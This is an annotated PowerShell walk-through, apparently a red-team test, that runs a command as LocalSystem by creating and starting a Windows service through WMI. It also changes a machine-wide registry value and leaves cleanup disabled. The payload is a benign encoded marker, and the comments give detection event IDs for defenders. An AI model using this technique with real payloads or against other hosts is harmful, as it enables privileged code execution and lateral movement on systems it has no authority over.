WMI service creation

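This code uses WMI (CIM) to create a new Windows service whose binary path is a command line; starting the service runs that command as LocalSystem. Attackers use this technique to execute a malicious command for lateral movement between hosts. As written, the snippet names no remote target, so it acts on the local machine, and the encoded command it runs is a harmless marker (it appends the current date to C:\Test\owned.txt).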

# Annotated walk-through of command execution through a WMI-created service.
# Three steps: (1) write a registry value via StdRegProv, (2) create a service
# via Win32_Service.Create, (3) look the service up and start it.
# Nothing here restores the registry value or removes the service afterwards.

# Step 1: set HKLM\SYSTEM\CurrentControlSet\Control\WaitToKillServiceTimeout
# to the string '120000' using the WMI registry provider.
# NOTE(review): this is a machine-wide setting. Windows documents this value as
# the time (ms) services are given to stop at shutdown; whether it affects the
# service started below cannot be confirmed from this snippet.
# Detection: a write to this value outside a change window is an artifact in
# itself (registry auditing, e.g. Sysmon Event ID 13).
Invoke-CimMethod -Namespace root/default -ClassName StdregProv -MethodName SetStringValue -Arguments @{
	hDefKey = [UInt32] 2147483650 # 0x80000002 = HKEY_LOCAL_MACHINE (HKLM)
	sSubKeyName = 'SYSTEM\CurrentControlSet\Control'
	sValueName = 'WaitToKillServiceTimeout'
	sValue = '120000'
}
 
# Step 2: register a manual-start service named 'Owned' that runs as
# LocalSystem. ServiceType 16 (0x10) is "own process"; ErrorControl 1 is
# "normal".
# Detection: service installation is logged as Event ID 7045 (System log,
# Service Control Manager) and, when the audit policy is enabled, Security
# Event ID 4697; both record the service name and image path. An image path
# that starts with 'cmd /c' or contains 'powershell ... -EncodedCommand' is a
# strong indicator, as is the process chain services.exe -> cmd.exe ->
# powershell.exe.
Invoke-CimMethod -ClassName Win32_Service -MethodName Create -Arguments @{
	StartMode = 'Manual'
	StartName = 'LocalSystem'
	ServiceType = ([Byte] 16)
	ErrorControl = ([Byte] 1)
	Name = 'Owned'
	DisplayName = 'Owned'
	DesktopInteract  = $False
	# The double-quoted string expands $Env:windir when this script runs, so the
	# stored path carries the value from the machine that built the string.
	# The Base64 argument is UTF-16LE and decodes to the benign marker
	#   Get-Date | Out-File C:\Test\owned.txt -Append
	# Defenders should decode -EncodedCommand values found in service image
	# paths the same way during triage.
	PathName = "cmd /c $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand RwBlAHQALQBEAGEAdABlACAAfAAgAE8AdQB0AC0ARgBpAGwAZQAgAEMAOgBcAFQAZQBzAHQAXABvAHcAbgBlAGQALgB0AHgAdAAgAC0AQQBwAHAAZQBuAGQA -NonInteractive -NoProfile"
}
 
# Step 3: fetch the service instance by name and ask the SCM to start it.
# cmd.exe is not a service binary and does not report status to the SCM, so the
# start is typically logged as a service start failure/timeout (commonly
# Event IDs 7009 and 7000) even though the command line was executed.
$EvilService = Get-CimInstance -ClassName Win32_Service -Filter 'Name = "Owned"'	
Invoke-CimMethod -MethodName StartService -InputObject $EvilService
# Cleanup is disabled: the 'Owned' service and the registry change from step 1
# stay on the host after a run. In a lab, remove the service and restore the
# registry value afterwards. Deleting the service does not remove the 7045/4697
# records already written.
#Invoke-CimMethod -MethodName Delete -InputObject $EvilService

References:
